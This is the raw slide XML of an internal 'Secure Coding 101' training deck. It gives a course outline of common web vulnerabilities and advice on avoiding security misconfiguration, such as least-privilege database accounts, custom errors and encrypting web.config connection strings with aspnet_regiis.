            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5A228C-F3AF-4743-8B24-9ADD72E43182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554500" y="4392964"/>
            <a:ext cx="3381375" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F995CBC2-1A10-40C3-92E1-BE7E59A9FCBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213854" y="5534742"/>
            <a:ext cx="5286375" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D3B84E5-0B6E-41AB-9535-20F31A0CE67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6632155" y="5343181"/>
            <a:ext cx="5078775" cy="1267886"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -site "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VulnerableApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“ -app "/“ -pe "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connectionStrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3483334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D66C48-2BB2-4024-9590-18D681ADBB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Secure Coding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2569DCE-AF72-42EE-B85A-60308C4E402B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EA60BD2-9D33-4DC0-95F6-C63A704D032E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>2018-08-07</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691B7D71-CD73-4A56-8FD7-C0B9148A68D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Presented by Pieter Myburgh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F166B5A-FABE-4629-9DDF-76D82D3ED17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Internal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="762422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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7744428"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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1540363"/>
            <a:ext cx="10876793" cy="110799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b="1" dirty="0"/>
              <a:t>Apply the principle of least privilege to your database accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Data reader and writer rights for a single account">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56C27357-5390-4949-AD27-56278405F1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845" y="1928847"/>
            <a:ext cx="5332163" cy="48075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ranular access rights for a SQL account">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD7EE6C2-1B33-4255-B9C0-5D75C2452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1128" y="1928846"/>
            <a:ext cx="5332163" cy="481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349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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7744428"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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1628507"/>
            <a:ext cx="10876793" cy="3600986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUMMARY:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Simple configuration changes can introduce serious security risks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get custom errors and tracing under control </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Make sure you have a strategy for keep frameworks current </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NuGet makes package management easy </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Protect sensitive data in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Automate the security configuration of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> settings </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use config transforms to correctly configure it during deployment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Consider retail mode on the server as a safety net </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939015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8919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9E6B4B1-425F-4FB9-BC21-21154DBD3329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276472" y="201908"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Quote of the Day</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60B6DC0A-24F2-4633-9F55-9DD8225BE053}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" sz="2000" dirty="0"/>
              <a:t>“Why is it so difficult to code securely?.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8F9E963-DB6C-476F-B9CC-F39A1DC0FAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3052918" y="1735758"/>
            <a:ext cx="5903913" cy="1566174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="2286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ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for einstein">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C83E614-35B6-4282-8D18-417524131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877" y="1104418"/>
            <a:ext cx="3037644" cy="3851665"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30F1536-C570-4EC9-A592-BE8C877B922F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900877" y="4956083"/>
            <a:ext cx="6349668" cy="1389298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="2286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0"/>
              </a:spcAft>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Everybody is a Genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Albert Einstein.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1800778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3B64E7-FC4E-49B1-BE10-07D1B45EB8D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Secure Coding 101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C97B614-C138-41B7-BCE1-E640FD0F2F13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" sz="2400" dirty="0"/>
              <a:t>Course Outline:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1301C394-B18A-46B3-BEDE-2342534D7265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1894788"/>
            <a:ext cx="6416596" cy="4234549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="2400" b="1" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="2400" b="1" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="2400" b="1" dirty="0"/>
              <a:t>XSS – Cross site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="2400" b="1" dirty="0"/>
              <a:t>Broken authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="2400" b="1" dirty="0"/>
              <a:t>CSRF – Cross site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="2400" b="1" dirty="0"/>
              <a:t>Security misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Related image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A6223C7-C12E-497F-A5C5-8CC6ED0DB52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trans="53000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7423842" y="0"/>
            <a:ext cx="4768158" cy="685799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98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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="3789820"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Introductions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
